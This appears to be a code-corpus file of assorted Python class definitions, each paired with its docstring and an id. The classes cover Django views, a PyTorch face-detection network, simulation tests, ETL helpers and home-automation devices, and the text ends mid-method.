class purchase_view_details(template): <NEW_LINE> <INDENT> def get(self, request, transaction_number): <NEW_LINE> <INDENT> r = requests.get(url = PURCHASE_TRANSACTION, params = {'transaction_number':transaction_number}) <NEW_LINE> if r.status_code is 200: <NEW_LINE> <INDENT> json_data = r.json() <NEW_LINE> if hasUpdatePurchaseRecordAccess(request.user): <NEW_LINE> <INDENT> item_list = json.loads(requests.get(PURCHASE_ITEM_LIST).text) <NEW_LINE> uom = json.loads(requests.get(UNIT_OF_MEASURE).text) <NEW_LINE> po_header_statuses = json.loads(requests.get(PURCHASE_ORDER_HEADER_STATUS).text) <NEW_LINE> po_type = json.loads(requests.get(PURCHASE_ORDER_TYPE).text) <NEW_LINE> supplier_list = json.loads(requests.get(SUPPLIER_LIST).text) <NEW_LINE> if 'transaction_date' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> json_data['purchase_trx_details'][0]['transaction_date'] = json_data['purchase_trx_details'][0]['transaction_date'].split(' ')[0] <NEW_LINE> <DEDENT> if 'receipt_details' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> for row in json_data['purchase_trx_details'][0]['receipt_details']: <NEW_LINE> <INDENT> if row['challan_date']: <NEW_LINE> <INDENT> row['challan_date'] = row['challan_date'].split(' ')[0] <NEW_LINE> <DEDENT> if row['receipt_date']: <NEW_LINE> <INDENT> row['receipt_date'] = row['receipt_date'].split(' ')[0] <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> data= {'user' : request.user.username, 'po_type' : po_type['purchaseOrderType'], 'supplier_list' : supplier_list['supplierLists'], 'item_list' : item_list['itemDetailsList'], 'uom' : uom['UnitOfMeasure'], 'header_status' : po_header_statuses['purchaseOrderHeaderStatus'], 'details' : json_data['purchase_trx_details'][0] } <NEW_LINE> if json_data['purchase_trx_details'][0]['order_status'] == 'OPEN': <NEW_LINE> <INDENT> template = jinja_template.get_template('purchase/purchase-line-update.html') <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> template = jinja_template.get_template('purchase/purchase-line-view.html') <NEW_LINE> <DEDENT> return HttpResponse(template.render(request, data=data)) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if 'transaction_date' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> json_data['purchase_trx_details'][0]['transaction_date'] = json_data['purchase_trx_details'][0]['transaction_date'].split(' ')[0] <NEW_LINE> <DEDENT> if 'receipt_details' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> for row in json_data['purchase_trx_details'][0]['receipt_details']: <NEW_LINE> <INDENT> row['receipt_date'] = row['receipt_date'].split(' ')[0] <NEW_LINE> row['challan_date'] = row['challan_date'].split(' ')[0] <NEW_LINE> <DEDENT> <DEDENT> template = jinja_template.get_template('purchase/purchase-line-view.html') <NEW_LINE> return HttpResponse(template.render(request, data=json_data['purchase_trx_details'][0])) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> template = jinja_template.get_template('internal_server_error.html') <NEW_LINE> return HttpResponse(template.render(request)) | classdocs | 62598fab851cf427c66b825f |
class NODE_OT_template_add(Operator): <NEW_LINE> <INDENT> bl_idname = "node.template_add" <NEW_LINE> bl_label = "Add node group template" <NEW_LINE> bl_description = "Add node group template" <NEW_LINE> bl_options = {'REGISTER', 'UNDO'} <NEW_LINE> filepath: StringProperty( subtype='FILE_PATH', ) <NEW_LINE> group_name: StringProperty( ) <NEW_LINE> def execute(self, context): <NEW_LINE> <INDENT> node_template_add(context, self.filepath, self.group_name, True, self.report) <NEW_LINE> return {'FINISHED'} <NEW_LINE> <DEDENT> def invoke(self, context, event): <NEW_LINE> <INDENT> node_template_add(context, self.filepath, self.group_name, event.shift, self.report) <NEW_LINE> return {'FINISHED'} | Add a node template | 62598fab7047854f4633f37d |
class RegisterView(View): <NEW_LINE> <INDENT> def get(self,requset): <NEW_LINE> <INDENT> return render(requset,"register.html") <NEW_LINE> <DEDENT> def post(self,request): <NEW_LINE> <INDENT> user_name = request.POST.get("user_name") <NEW_LINE> password = request.POST.get("pwd") <NEW_LINE> email = request.POST.get("email") <NEW_LINE> allow = request.POST.get("allow") <NEW_LINE> if not all([user_name,password,email]): <NEW_LINE> <INDENT> return redirect(reverse("users:register")) <NEW_LINE> <DEDENT> if not re.match(r"^[a-z0-9][\w\.\-]*@[a-z0-9\-]+(\.[a-z]{2,5}){1,2}$", email): <NEW_LINE> <INDENT> return render(request, 'register.html', {'errmsg':'邮箱格式不正确'}) <NEW_LINE> <DEDENT> if allow != "on": <NEW_LINE> <INDENT> return render(request, "register.html", {"errmsg":"没有勾选用户协议"}) <NEW_LINE> <DEDENT> try: <NEW_LINE> <INDENT> user = User.objects.create_user(user_name, email, password) <NEW_LINE> <DEDENT> except IntegrityError: <NEW_LINE> <INDENT> return render(request, 'register.html', {'errmsg': '用户名已存在'}) <NEW_LINE> <DEDENT> user.is_active = False <NEW_LINE> user.save() <NEW_LINE> token = user.generate_active_token() <NEW_LINE> send_active_email.delay(email, user_name, token) <NEW_LINE> return redirect(reverse('goods:index')) | 类视图:处理注册 | 62598fab2ae34c7f260ab085 |
class FactorMixture(Factor): <NEW_LINE> <INDENT> def accept(self, visitor, *args, **kwargs): <NEW_LINE> <INDENT> return visitor.visit_factor_mixture(self, *args, **kwargs) <NEW_LINE> <DEDENT> def __init__(self, x, factors, _lambda): <NEW_LINE> <INDENT> self.x = x <NEW_LINE> self.factors = list(factors) <NEW_LINE> self._lambda = _lambda <NEW_LINE> <DEDENT> def neighbours(self): <NEW_LINE> <INDENT> from itertools import chain <NEW_LINE> result = set() <NEW_LINE> for f in self.factors: <NEW_LINE> <INDENT> for n in f.neighbours(): <NEW_LINE> <INDENT> result.add(n) <NEW_LINE> <DEDENT> <DEDENT> result.add(self._lambda) <NEW_LINE> return result <NEW_LINE> <DEDENT> @assert_result_finite <NEW_LINE> def calculate_update_for(self, v, var_dists): <NEW_LINE> <INDENT> if self.x == v: <NEW_LINE> <INDENT> _lambda = var_dists[self._lambda].get_expectation() <NEW_LINE> y = numpy.array([f.calculate_update_for(v, var_dists) for f in self.factors]) <NEW_LINE> return _lambda * y <NEW_LINE> <DEDENT> if self._lambda == v: <NEW_LINE> <INDENT> log_likelihoods = numpy.array( [f.log_likelihood(var_dists) for f in self.factors]) <NEW_LINE> return log_likelihoods <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> _lambda = var_dists[self._lambda].get_expectation() <NEW_LINE> for f, p in zip(self.factors, _lambda): <NEW_LINE> <INDENT> if v in f.neighbours(): <NEW_LINE> <INDENT> return p * f.calculate_update_for(v, var_dists) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> raise RuntimeError( 'Neighbour, v, not known by factor. Cannot calculate an update for unknown vertex.') <NEW_LINE> <DEDENT> @assert_result_finite <NEW_LINE> def log_likelihood(self, var_dists): <NEW_LINE> <INDENT> _lambda = var_dists[self._lambda].get_expectation() <NEW_LINE> log_likelihoods = numpy.array( [f.log_likelihood(var_dists) for f in self.factors]) <NEW_LINE> return numpy.dot(_lambda, log_likelihoods) | A factor in a factor graph that models a mixture of several other factors. | 62598fab4f6381625f199490 |
class TestPersonAgent(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> logging.basicConfig(format="%(levelname)s %(asctime)s: %(message)s", level=logging.DEBUG) <NEW_LINE> self.sim = Simulation(number_of_floors=10) <NEW_LINE> self.ctrl = ElevatorBank(self.sim) <NEW_LINE> self.first_elevator = self.ctrl.add_elevator(capacity=1) <NEW_LINE> self.sim.elevator_banks.append(self.ctrl) <NEW_LINE> self.person = Person(self.sim) <NEW_LINE> self.person.schedule.add_event(timedelta(hours=7), self.sim.building.floors[6]) <NEW_LINE> self.person.schedule.add_event(timedelta(hours=12), self.sim.building.floors[5]) <NEW_LINE> self.person.schedule.add_event(timedelta(hours=16), self.sim.building.floors[0]) <NEW_LINE> self.sim.people.append(self.person) <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def test_elevator_capacity_skip(self): <NEW_LINE> <INDENT> person2 = Person(self.sim) <NEW_LINE> person2.schedule.add_event(timedelta(hours=7), self.sim.building.floors[3]) <NEW_LINE> self.sim.people.append(person2) <NEW_LINE> num_tests = 1 <NEW_LINE> def count_floor(event): <NEW_LINE> <INDENT> nonlocal num_tests <NEW_LINE> num_tests += 1 <NEW_LINE> <DEDENT> person2.register_event_callback("floor_reached", count_floor) <NEW_LINE> until_time = timedelta(hours=8).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(4, num_tests) <NEW_LINE> <DEDENT> def test_arrives_at_work_level(self): <NEW_LINE> <INDENT> until_time = timedelta(hours=8).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(self.first_elevator.location, self.person.schedule.events[0].location) <NEW_LINE> self.assertEqual(self.person.location, self.person.schedule.events[0].location) <NEW_LINE> <DEDENT> def test_arrives_at_lunch_level(self): <NEW_LINE> <INDENT> until_time = timedelta(hours=13).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(self.first_elevator.location, self.person.schedule.events[1].location) <NEW_LINE> self.assertEqual(self.person.location, self.person.schedule.events[1].location) <NEW_LINE> <DEDENT> def test_arrives_work_done_level(self): <NEW_LINE> <INDENT> until_time = timedelta(hours=17).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(self.first_elevator.location, self.person.schedule.events[2].location) <NEW_LINE> self.assertEqual(self.person.location, self.person.schedule.events[2].location) | Test case docstring. | 62598fab21bff66bcd722c0a |
class Named(type): <NEW_LINE> <INDENT> _names = {} <NEW_LINE> def __new__(metacls, name, bases, attrs): <NEW_LINE> <INDENT> name = attrs['name'] <NEW_LINE> iface = attrs['iface'] <NEW_LINE> cls = metacls._names.setdefault(name, {}).get(iface) <NEW_LINE> if cls is None: <NEW_LINE> <INDENT> cls = super(Named, metacls).__new__(metacls, name, bases, attrs) <NEW_LINE> metacls._names[name][iface] = cls <NEW_LINE> <DEDENT> return cls <NEW_LINE> <DEDENT> def __call__(cls): <NEW_LINE> <INDENT> return injector.get_instance(cls.iface, name=cls.name) | Metaclass to implement named lookup of dependencies | 62598faba219f33f346c67ba |
class RNet(nn.Module): <NEW_LINE> <INDENT> def __init__(self,is_train=False, use_cuda=True): <NEW_LINE> <INDENT> super(RNet, self).__init__() <NEW_LINE> self.is_train = is_train <NEW_LINE> self.use_cuda = use_cuda <NEW_LINE> self.pre_layer = nn.Sequential( nn.Conv2d(3, 28, kernel_size=3, stride=1), nn.PReLU(), nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True), nn.Conv2d(28, 48, kernel_size=3, stride=1), nn.PReLU(), nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True), nn.Conv2d(48, 64, kernel_size=2, stride=1), nn.PReLU() ) <NEW_LINE> self.conv4 = nn.Linear(64*3*3, 128) <NEW_LINE> self.prelu4 = nn.PReLU() <NEW_LINE> self.conv5_1 = nn.Linear(128, 1) <NEW_LINE> self.conv5_2 = nn.Linear(128, 4) <NEW_LINE> self.conv5_3 = nn.Linear(128, 10) <NEW_LINE> self.apply(weights_init) <NEW_LINE> <DEDENT> def forward(self, x): <NEW_LINE> <INDENT> x = self.pre_layer(x) <NEW_LINE> x = x.view(x.size(0), -1) <NEW_LINE> x = self.conv4(x) <NEW_LINE> x = self.prelu4(x) <NEW_LINE> det = torch.sigmoid(self.conv5_1(x)) <NEW_LINE> box = self.conv5_2(x) <NEW_LINE> if self.is_train is True: <NEW_LINE> <INDENT> return det, box <NEW_LINE> <DEDENT> return det, box | RNet | 62598fab435de62698e9bd9a |
class FilterWordsPipeline(object): <NEW_LINE> <INDENT> words_to_filter = ['politics', 'religion'] <NEW_LINE> def process_item(self, item, spider): <NEW_LINE> <INDENT> if re.match(r'^.*((\))|(\()|(船只)|(沙箱)|(规范)|(信条)|(维基)|(名片)|(版权)|(军备)|(药品)|(百科)|(严肃)|(方针)|(管理)|(申请)|(指南)|(/)|(\.\.\.)|(的)|(第[一二三四五六七八九十])).*$', item['name']): <NEW_LINE> <INDENT> raise DropItem("Contains forbidden word: %s" % word) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return item | A pipeline for filtering out items which contain certain words in their
description | 62598fab4428ac0f6e6584c8 |
class PotentiallyInvisibleTab(WaitTab): <NEW_LINE> <INDENT> def select(self): <NEW_LINE> <INDENT> if not self.is_displayed: <NEW_LINE> <INDENT> self.logger.info("Tab not present and ignoring turned on - not touching the tab.") <NEW_LINE> return <NEW_LINE> <DEDENT> return super(PotentiallyInvisibleTab, self).select() | Tab, that can be potentially invisible. | 62598fab2c8b7c6e89bd3769 |
class DecoupledFactTable(pygrametl.parallel.Decoupled): <NEW_LINE> <INDENT> def __init__(self, facttbl, returnvalues=True, consumes=(), attstoconsume=(), batchsize=500, queuesize=200): <NEW_LINE> <INDENT> pygrametl.parallel.Decoupled.__init__( self, facttbl, returnvalues, consumes, tuple([(0, a) for a in attstoconsume]), batchsize, queuesize, False) <NEW_LINE> if facttbl in pygrametl._alltables: <NEW_LINE> <INDENT> pygrametl._alltables.remove(facttbl) <NEW_LINE> <DEDENT> pygrametl._alltables.append(self) <NEW_LINE> <DEDENT> def insert(self, row, namemapping={}): <NEW_LINE> <INDENT> return self._enqueue('insert', row, namemapping) <NEW_LINE> <DEDENT> def endload(self): <NEW_LINE> <INDENT> self._enqueuenoreturn('endload') <NEW_LINE> self._endbatch() <NEW_LINE> self._join() <NEW_LINE> return None <NEW_LINE> <DEDENT> def lookup(self, row, namemapping={}): <NEW_LINE> <INDENT> if hasattr(self._obj, 'lookup'): <NEW_LINE> <INDENT> return self._enqueue('lookup', row, namemapping) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise AttributeError('The object does not support lookup') <NEW_LINE> <DEDENT> <DEDENT> def ensure(self, row, namemapping={}): <NEW_LINE> <INDENT> if hasattr(self._obj, 'ensure'): <NEW_LINE> <INDENT> return self._enqueue('ensure', row, namemapping) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise AttributeError('The object does not support ensure') | A FactTable-like class that enables parallelism by executing all
operations on a given FactTable in a separate, dedicated process
(that FactTable is said to be "decoupled"). | 62598fab32920d7e50bc5ff9 |
class Point: <NEW_LINE> <INDENT> def __init__(self, pointname, x, y, h): <NEW_LINE> <INDENT> self.PointName = pointname <NEW_LINE> self.X = x <NEW_LINE> self.Y = y <NEW_LINE> self.H = h <NEW_LINE> <DEDENT> def Cal_Distans(self, x0, y0): <NEW_LINE> <INDENT> d = math.sqrt(math.pow(x0-self.X, 2)+math.pow(y0-self.Y, 2)) <NEW_LINE> return d | 包含 点名 数学坐标X 数学坐标Y 高程(z)H | 62598fabf548e778e596b548 |
class EditMirror9Test(BaseTest): <NEW_LINE> <INDENT> fixtureCmds = ["aptly mirror create -keyring=aptlytest.gpg mirror9 http://pkg.jenkins-ci.org/debian-stable binary/"] <NEW_LINE> fixtureGpg = True <NEW_LINE> runCmd = "aptly mirror edit -with-udebs mirror9" <NEW_LINE> expectedCode = 1 | edit mirror: flat mirror with udebs | 62598fab498bea3a75a57ac2 |
class Testwhat_ext(UnitTestBase): <NEW_LINE> <INDENT> def get_ext_dir(self): <NEW_LINE> <INDENT> return os.path.join(self.datadir, 'ext') <NEW_LINE> <DEDENT> def setUp(self): <NEW_LINE> <INDENT> UnitTestBase.setUp(self) <NEW_LINE> self._files = ['a.txt', 'b.html', 'c.txtl', 'español.txt'] <NEW_LINE> os.mkdir(self.get_ext_dir()) <NEW_LINE> for mem in self._files: <NEW_LINE> <INDENT> with open(os.path.join(self.get_ext_dir(), mem), 'w') as fp: <NEW_LINE> <INDENT> fp.write('lorem ipsum') <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def test_returns_extension_if_file_has_extension(self): <NEW_LINE> <INDENT> d = self.get_ext_dir() <NEW_LINE> eq_(tools.what_ext(['txt', 'html'], os.path.join(d, 'a')), 'txt') <NEW_LINE> eq_(tools.what_ext(['txt', 'html'], os.path.join(d, 'b')), 'html') <NEW_LINE> eq_(tools.what_ext(['txt', 'html'], os.path.join(d, 'español')), 'txt') <NEW_LINE> <DEDENT> def test_returns_None_if_extension_not_present(self): <NEW_LINE> <INDENT> d = self.get_ext_dir() <NEW_LINE> eq_(tools.what_ext([], os.path.join(d, 'a')), None) <NEW_LINE> eq_(tools.what_ext(['html'], os.path.join(d, 'a')), None) | tools.what_ext | 62598fabaad79263cf42e778 |
class ContractSyncronizeUnitTest(unittest.TestCase): <NEW_LINE> <INDENT> def test_syncronize_success(self): <NEW_LINE> <INDENT> my_contract = Contract("0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae") <NEW_LINE> self.assertEqual(my_contract.last_syncronization, None) <NEW_LINE> my_contract.syncronize() <NEW_LINE> self.assertNotEqual(my_contract.last_syncronization, None) <NEW_LINE> self.assertTrue(my_contract.last_syncronization < datetime.now()) <NEW_LINE> <DEDENT> def test_syncronize_when_contract_not_deployed(self): <NEW_LINE> <INDENT> my_contract = Contract() <NEW_LINE> self.assertEqual(my_contract.last_syncronization, None) <NEW_LINE> with self.assertRaises(ContractNotDeployedException): <NEW_LINE> <INDENT> my_contract.syncronize() | Tests on contracts syncronization | 62598fab10dbd63aa1c70b58 |
class pWB_shortcuts: <NEW_LINE> <INDENT> def __init__(self,parent): <NEW_LINE> <INDENT> self.back_sc = QShortcut(QKeySequence(parent.tr("Ctrl+H")),parent) <NEW_LINE> self.reload_sc = QShortcut(QKeySequence(parent.tr("F5")),parent) <NEW_LINE> self.urld_sc = QShortcut(QKeySequence(parent.tr("Ctrl+G")),parent) <NEW_LINE> self.search_sc = QShortcut(QKeySequence(parent.tr("/")),parent) <NEW_LINE> self.disable_scripts_sc = QShortcut(QKeySequence(parent.tr("Ctrl+S")), parent) <NEW_LINE> self.enable_scripts_sc = QShortcut(QKeySequence(parent.tr("Ctrl+Shift+S")), parent) | Class that holds all keyboard shortcuts for pWB | 62598fab01c39578d7f12d24 |
class New(models.Model): <NEW_LINE> <INDENT> title = models.CharField( 'Заголовок', max_length=140, unique_for_date='update' ) <NEW_LINE> description = models.TextField( 'Описание', max_length=140 ) <NEW_LINE> content = models.TextField( 'Содержание' ) <NEW_LINE> pubdate = models.DateTimeField( 'Дата публикации', auto_now_add=True ) <NEW_LINE> update = models.DateTimeField( 'Дата изменения', auto_now=True ) <NEW_LINE> status = models.BooleanField( 'Статус', default=True ) <NEW_LINE> class Meta: <NEW_LINE> <INDENT> ordering = ['-pubdate'] <NEW_LINE> verbose_name = "Новость" <NEW_LINE> verbose_name_plural = "Новости" <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return '{} - {}'.format(self.title, self.description) <NEW_LINE> <DEDENT> def get_absolute_url(self): <NEW_LINE> <INDENT> return reverse('news_detail', kwargs={'slug': self.pk}) | Model of news. | 62598fab009cb60464d014c5 |
class ModelComposition(ModelDefinition): <NEW_LINE> <INDENT> def __init__(self, kwds): <NEW_LINE> <INDENT> ModelDefinition.__init__(self, kwds) <NEW_LINE> self.description = None <NEW_LINE> self.model = [] <NEW_LINE> self.initialization = [] <NEW_LINE> self.inputlink=[] <NEW_LINE> self.outputlink=[] <NEW_LINE> self.internallink=[] <NEW_LINE> self.parametersets = {} <NEW_LINE> self.inputs=[] <NEW_LINE> self.outputs=[] <NEW_LINE> self.path = None <NEW_LINE> self.aPath=None <NEW_LINE> self.states=[] <NEW_LINE> <DEDENT> def add_description(self, description): <NEW_LINE> <INDENT> self.description = description <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return 'ModelComposition' | Formal description of a Model Composite. | 62598fab44b2445a339b6942 |
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): <NEW_LINE> <INDENT> def handle(self): <NEW_LINE> <INDENT> self.announce = announce <NEW_LINE> data = self.request.recv(1024) <NEW_LINE> cur_thread = threading.current_thread() <NEW_LINE> if data is not None: <NEW_LINE> <INDENT> self.announce.uppercase(data.decode("utf-8") + "/n") <NEW_LINE> self.request.send(bytes("message recieved from {0}".format(cur_thread.name), 'utf-8')) <NEW_LINE> <DEDENT> self.request.close() | Echo data back in uppercase | 62598fab442bda511e95c3fc |
class Place(object): <NEW_LINE> <INDENT> def __init__(self, name, exit=None): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self.exit = exit <NEW_LINE> self.bees = [] <NEW_LINE> self.ant = None <NEW_LINE> self.entrance = None <NEW_LINE> if self.exit != None: <NEW_LINE> <INDENT> self.exit.entrance = self <NEW_LINE> <DEDENT> <DEDENT> def add_insect(self, insect): <NEW_LINE> <INDENT> if insect.is_ant: <NEW_LINE> <INDENT> if self.ant is None: <NEW_LINE> <INDENT> self.ant = insect <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if self.ant.can_contain(insect): <NEW_LINE> <INDENT> self.ant.contain_ant(insect) <NEW_LINE> <DEDENT> elif insect.can_contain(self.ant): <NEW_LINE> <INDENT> insect.contain_ant(self.ant) <NEW_LINE> self.ant = insect <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> assert self.ant is None, 'Two ants in {0}'.format(self) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.bees.append(insect) <NEW_LINE> <DEDENT> insect.place = self <NEW_LINE> <DEDENT> def remove_insect(self, insect): <NEW_LINE> <INDENT> if insect.is_ant: <NEW_LINE> <INDENT> if self.ant is insect: <NEW_LINE> <INDENT> if hasattr(self.ant, 'container') and self.ant.container: <NEW_LINE> <INDENT> self.ant = self.ant.ant <NEW_LINE> <DEDENT> elif isinstance(self.ant, QueenAnt) and self.ant.imposter == False: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.ant = None <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> if isinstance(self.ant, QueenAnt) or isinstance(insect, QueenAnt) and insect.imposter == False: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> if hasattr(self.ant, 'container') and self.ant.container and self.ant.ant is insect: <NEW_LINE> <INDENT> self.ant.ant = None <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> assert False, '{0} is not in {1}'.format(insect, self) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.bees.remove(insect) <NEW_LINE> <DEDENT> insect.place = None <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.name | A Place holds insects and has an exit to another Place. | 62598fab4f6381625f199491 |
class Writer(object): <NEW_LINE> <INDENT> def __init__(self, request): <NEW_LINE> <INDENT> self.request = request <NEW_LINE> <DEDENT> def write(self, data): <NEW_LINE> <INDENT> f = self.request.get_wfile() <NEW_LINE> self.write = f <NEW_LINE> return self.write(data) | Perform a start_response if need be when we start writing. | 62598faba8370b77170f0381 |
class UnitTestTypes(DynamicTypeEnum): <NEW_LINE> <INDENT> @staticmethod <NEW_LINE> def get_unittest_enum_class() -> List[DynamicTypeEnum]: <NEW_LINE> <INDENT> from ..project.constants import Unittest_Module_Folder <NEW_LINE> try: <NEW_LINE> <INDENT> return DynamicTypeEnum.get_dynamic_class_enum_class(Unittest_Module_Folder) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> def import_class(self): <NEW_LINE> <INDENT> return super().import_class(cls_type=UnitTestCase) | base abstract unitest enum class | 62598fab32920d7e50bc5ffa |
class Dashboard(models.Model): <NEW_LINE> <INDENT> slug = models.SlugField(unique=True) <NEW_LINE> sites = models.ManyToManyField(Site, blank=True) <NEW_LINE> def __unicode__(self): <NEW_LINE> <INDENT> return self.slug | A group of featured stuff. | 62598fab63d6d428bbee2750 |
class LearningRateSchedulerInvSqrtT(LearningRateScheduler): <NEW_LINE> <INDENT> def __init__(self, updates_per_checkpoint: int, half_life: int, warmup: int = 0) -> None: <NEW_LINE> <INDENT> super().__init__(warmup) <NEW_LINE> check_condition(updates_per_checkpoint > 0, "updates_per_checkpoint needs to be > 0.") <NEW_LINE> check_condition(half_life > 0, "half_life needs to be > 0.") <NEW_LINE> self.factor = 3. / (half_life * updates_per_checkpoint) <NEW_LINE> self.t_last_log = -1 <NEW_LINE> self.log_every_t = int(half_life * updates_per_checkpoint) <NEW_LINE> <DEDENT> def __call__(self, num_updates: int): <NEW_LINE> <INDENT> lr = min(self.base_lr / sqrt(1 + num_updates * self.factor), self._warmup(num_updates) if self.warmup > 0 else C.LARGE_POSITIVE_VALUE) <NEW_LINE> if num_updates > self.t_last_log and num_updates % self.log_every_t == 0: <NEW_LINE> <INDENT> logger.info("Learning rate currently at %1.2e", lr) <NEW_LINE> self.t_last_log = num_updates <NEW_LINE> <DEDENT> return lr | Learning rate schedule: lr / sqrt(1 + factor * t).
Note: The factor is calculated from the half life of the learning rate.
:param updates_per_checkpoint: Number of batches between checkpoints.
:param half_life: Half life of the learning rate in number of checkpoints.
:param warmup: Number of (linear) learning rate increases to warm-up. | 62598fab99cbb53fe6830e7d |
class StartDownload(BackendMessage): <NEW_LINE> <INDENT> def __init__(self, id_): <NEW_LINE> <INDENT> self.id = id_ <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return BackendMessage.__repr__(self) + (", id: %s" % self.id) | Start downloading an item.
| 62598fabac7a0e7691f724af |
class GatherRemoteMongoCoredumps(PowercycleCommand): <NEW_LINE> <INDENT> COMMAND = "gatherRemoteMongoCoredumps" <NEW_LINE> def execute(self) -> None: <NEW_LINE> <INDENT> aws_ec2_yml = self.expansions["aws_ec2_yml"] <NEW_LINE> if os.path.exists(aws_ec2_yml) and os.path.isfile( aws_ec2_yml) or "ec2_ssh_failure" in self.expansions: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> remote_dir = "." if "remote_dir" not in self.expansions else self.expansions["remote_dir"] <NEW_LINE> cmds = "core_files=$(/usr/bin/find -H . ( -name '*.core' -o -name '*.mdmp' ) 2> /dev/null)" <NEW_LINE> cmds = f"{cmds}; if [ -z \"$core_files\" ]; then exit 0; fi" <NEW_LINE> cmds = f"{cmds}; echo Found remote core files $core_files, moving to $(pwd)" <NEW_LINE> cmds = f"{cmds}; for core_file in $core_files" <NEW_LINE> cmds = f"{cmds}; do base_name=$(echo $core_file | sed 's/.*///')" <NEW_LINE> cmds = f"{cmds}; if [ ! -f $base_name ]; then mv $core_file .; fi" <NEW_LINE> cmds = f"{cmds}; done" <NEW_LINE> self.remote_op.operation(SSHOperation.SHELL, cmds, remote_dir) | Gather Remote Mongo Coredumps. | 62598fab66673b3332c30371 |
class PrincipalError(FaraException): <NEW_LINE> <INDENT> pass | Raised when there is a problem with a principal data | 62598fab7cff6e4e811b59d2 |
class Image(object): <NEW_LINE> <INDENT> def __init__(self, filepath='', url='', collection_filepath='', metadata=None): <NEW_LINE> <INDENT> self.data = None <NEW_LINE> self.filepath = filepath <NEW_LINE> self.url = url <NEW_LINE> self.collection_filepath = '' <NEW_LINE> if filepath != '': <NEW_LINE> <INDENT> with contextlib.closing(open(filepath, 'rb')) as fp: <NEW_LINE> <INDENT> self.data = fp.read() <NEW_LINE> <DEDENT> self.collection_filepath = filepath <NEW_LINE> <DEDENT> self.url = url <NEW_LINE> if self.data is None and self.url != '': <NEW_LINE> <INDENT> self.collection_filepath = os.path.basename(self.url) <NEW_LINE> <DEDENT> if collection_filepath != '': <NEW_LINE> <INDENT> self.collection_filepath = collection_filepath <NEW_LINE> <DEDENT> if self.data is None and self.url == '': <NEW_LINE> <INDENT> raise ValueError('Image object needs either data or a URL.') <NEW_LINE> <DEDENT> self.metadata = metadata <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "Image(filepath=%r, url=%r, collection_filepath=%r, metadata=%r)" % (self.filepath, self.url, self.collection_filepath, self.metadata) | Class representing an image.
Image on filesystem:
>>> from tineyeservices import Image
>>> image = Image(filepath='/path/to/image.jpg', collection_filepath='collection.jpg')
Image URL:
>>> image = Image(url='https://tineye.com/images/meloncat.jpg', collection_filepath='collection.jpg')
Image with metadata:
>>> import json
>>> metadata = json.dumps({"keywords": ["dolphin"]})
>>> image = Image(filepath='/path/to/image.jpg', metadata=metadata) | 62598fab92d797404e388b37 |
class XiaomiGenericCover(XiaomiDevice, CoverDevice): <NEW_LINE> <INDENT> def __init__(self, device, name, data_key, xiaomi_hub): <NEW_LINE> <INDENT> self._data_key = data_key <NEW_LINE> self._pos = 0 <NEW_LINE> XiaomiDevice.__init__(self, device, name, xiaomi_hub) <NEW_LINE> <DEDENT> @property <NEW_LINE> def current_cover_position(self): <NEW_LINE> <INDENT> return self._pos <NEW_LINE> <DEDENT> @property <NEW_LINE> def is_closed(self): <NEW_LINE> <INDENT> return self.current_cover_position <= 0 <NEW_LINE> <DEDENT> def close_cover(self, **kwargs): <NEW_LINE> <INDENT> self._write_to_hub(self._sid, **{self._data_key: 'close'}) <NEW_LINE> <DEDENT> def open_cover(self, **kwargs): <NEW_LINE> <INDENT> self._write_to_hub(self._sid, **{self._data_key: 'open'}) <NEW_LINE> <DEDENT> def stop_cover(self, **kwargs): <NEW_LINE> <INDENT> self._write_to_hub(self._sid, **{self._data_key: 'stop'}) <NEW_LINE> <DEDENT> def set_cover_position(self, **kwargs): <NEW_LINE> <INDENT> position = kwargs.get(ATTR_POSITION) <NEW_LINE> self._write_to_hub(self._sid, **{ATTR_CURTAIN_LEVEL: str(position)}) <NEW_LINE> <DEDENT> def parse_data(self, data, raw_data): 